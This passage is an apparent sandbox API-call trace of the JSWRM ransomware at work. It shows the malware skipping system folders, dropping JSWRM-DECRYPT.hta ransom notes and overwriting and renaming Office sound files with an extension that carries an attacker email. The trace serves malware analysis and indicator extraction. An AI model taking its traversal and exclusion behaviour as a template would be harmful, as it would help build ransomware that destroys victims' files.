ftLastWriteTime.dwLowDateTime=0x4496fc1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.757] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.757] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.757] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.757] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.758] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.758] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.758] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.758] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.758] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.758] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.758] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4496fc1d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4496fc1d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4496fc1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0130.758] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0130.763] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1865b8d4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="Verisign", cAlternateFileName="")) returned 0 [0130.763] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0130.763] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447598d4, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x447598d4, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x447598d4, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.763] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.763] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.763] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.763] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.763] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.763] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.763] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.763] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.763] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.763] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.763] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18681a5c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Sounds", cAlternateFileName="")) returned 1 [0130.763] lstrcmpiW (lpString1="Sounds", lpString2=".") returned 1 [0130.763] lstrcmpiW (lpString1="Sounds", lpString2="..") returned 1 [0130.763] lstrcmpiW (lpString1="Sounds", lpString2="...") returned 1 [0130.763] lstrcmpiW (lpString1="Sounds", lpString2="windows") returned -1 [0130.763] lstrcmpiW (lpString1="Sounds", lpString2="recovery") returned 1 [0130.763] lstrcmpiW (lpString1="Sounds", lpString2="perflogs") returned 1 [0130.763] lstrcmpiW (lpString1="Sounds", lpString2="documents and settings") returned 1 [0130.764] lstrcmpiW (lpString1="Sounds", lpString2="$RECYCLE.BIN") returned 1 [0130.764] lstrcmpiW (lpString1="Sounds", lpString2="system volume information") returned -1 [0130.764] lstrcmpiW (lpString1="Sounds", lpString2="msocache") returned 1 [0130.764] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\jswrm-decrypt.hta")) returned 0xffffffff [0130.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0130.765] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.765] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0130.766] CloseHandle (hObject=0x238) returned 1 [0130.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\jswrm-decrypt.hta")) returned 0x20 [0130.767] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18681a5c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44995e98, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0130.767] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.767] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18681a5c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44995e98, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="..", cAlternateFileName="")) returned 1 [0130.767] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.767] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.767] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44995e98, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x44995e98, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x449bc0cd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.767] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.767] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.767] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.767] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.767] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.767] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.767] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.767] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.767] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.767] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f98, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.767] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18a3b641, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197321ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197321ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="People", cAlternateFileName="")) returned 1 [0130.767] lstrcmpiW (lpString1="People", lpString2=".") returned 1 [0130.767] lstrcmpiW (lpString1="People", lpString2="..") returned 1 [0130.767] lstrcmpiW (lpString1="People", lpString2="...") returned 1 [0130.768] lstrcmpiW (lpString1="People", lpString2="windows") returned -1 [0130.768] lstrcmpiW (lpString1="People", lpString2="recovery") returned -1 [0130.768] lstrcmpiW (lpString1="People", lpString2="perflogs") returned -1 [0130.768] lstrcmpiW (lpString1="People", lpString2="documents and settings") returned 1 [0130.768] lstrcmpiW (lpString1="People", lpString2="$RECYCLE.BIN") returned 1 [0130.768] lstrcmpiW (lpString1="People", lpString2="system volume information") returned -1 [0130.768] lstrcmpiW (lpString1="People", lpString2="msocache") returned 1 [0130.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\jswrm-decrypt.hta")) returned 0xffffffff [0130.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.771] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.771] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0130.772] CloseHandle (hObject=0x314) returned 1 [0130.772] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\jswrm-decrypt.hta")) returned 0x20 [0130.772] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18a3b641, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197321ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x449bc0cd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210734, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0130.773] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.773] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18a3b641, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197321ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x449bc0cd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="..", cAlternateFileName="")) returned 1 [0130.773] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.773] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.773] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18aadbcf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18aadbcf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6bd4, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="COUGH.WAV", cAlternateFileName="")) returned 1 [0130.773] lstrcmpiW (lpString1="COUGH.WAV", lpString2=".") returned 1 [0130.773] lstrcmpiW (lpString1="COUGH.WAV", lpString2="..") returned 1 [0130.773] lstrcmpiW (lpString1="COUGH.WAV", lpString2="...") returned 1 [0130.773] lstrcmpiW (lpString1="COUGH.WAV", lpString2="windows") returned -1 [0130.773] lstrcmpiW (lpString1="COUGH.WAV", lpString2="recovery") returned -1 [0130.773] lstrcmpiW (lpString1="COUGH.WAV", lpString2="perflogs") returned -1 [0130.773] lstrcmpiW (lpString1="COUGH.WAV", lpString2="documents and settings") returned -1 [0130.773] lstrcmpiW (lpString1="COUGH.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.773] lstrcmpiW (lpString1="COUGH.WAV", lpString2="system volume information") returned -1 [0130.773] lstrcmpiW (lpString1="COUGH.WAV", lpString2="msocache") returned -1 [0130.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUGH.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUGH.WAV", cchWideChar=9, lpMultiByteStr=0x345e508, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COUGH.WAV", lpUsedDefaultChar=0x0) returned 9 [0130.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUGH.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUGH.WAV", cchWideChar=9, lpMultiByteStr=0x345e4d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COUGH.WAV", lpUsedDefaultChar=0x0) returned 9 [0130.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\COUGH.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\cough.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.774] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=27604) returned 1 [0130.774] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.774] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6bd0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x6bd0, lpOverlapped=0x0) returned 1 [0130.777] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.777] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6bd0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x6bd0, lpOverlapped=0x0) returned 1 [0130.777] CloseHandle (hObject=0x338) returned 1 [0130.777] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\COUGH.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\cough.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\COUGH.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\cough.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.778] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18afa0b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18afa0b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18b202d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7860, dwReserved0=0x60002, dwReserved1=0x210734, cFileName="GIGGLE.WAV", cAlternateFileName="")) returned 1 [0130.778] lstrcmpiW (lpString1="GIGGLE.WAV", lpString2=".") returned 1 [0130.779] lstrcmpiW (lpString1="GIGGLE.WAV", lpString2="..") returned 1 [0130.779] lstrcmpiW (lpString1="GIGGLE.WAV", lpString2="...") returned 1 [0130.779] lstrcmpiW (lpString1="GIGGLE.WAV", lpString2="windows") returned -1 [0130.779] lstrcmpiW (lpString1="GIGGLE.WAV", lpString2="recovery") returned -1 [0130.779] lstrcmpiW (lpString1="GIGGLE.WAV", lpString2="perflogs") returned -1 [0130.779] lstrcmpiW (lpString1="GIGGLE.WAV", lpString2="documents and settings") returned 1 [0130.779] lstrcmpiW (lpString1="GIGGLE.WAV", lpString2="$RECYCLE.BIN") returned 1 [0130.779] lstrcmpiW (lpString1="GIGGLE.WAV", lpString2="system volume information") returned -1 [0130.779] lstrcmpiW (lpString1="GIGGLE.WAV", lpString2="msocache") returned -1 [0130.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIGGLE.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIGGLE.WAV", cchWideChar=10, lpMultiByteStr=0x345e508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GIGGLE.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIGGLE.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GIGGLE.WAV", cchWideChar=10, lpMultiByteStr=0x345e4d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GIGGLE.WAV", lpUsedDefaultChar=0x0) returned 10 [0130.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\People\\GIGGLE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\sounds\\people\\giggle.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 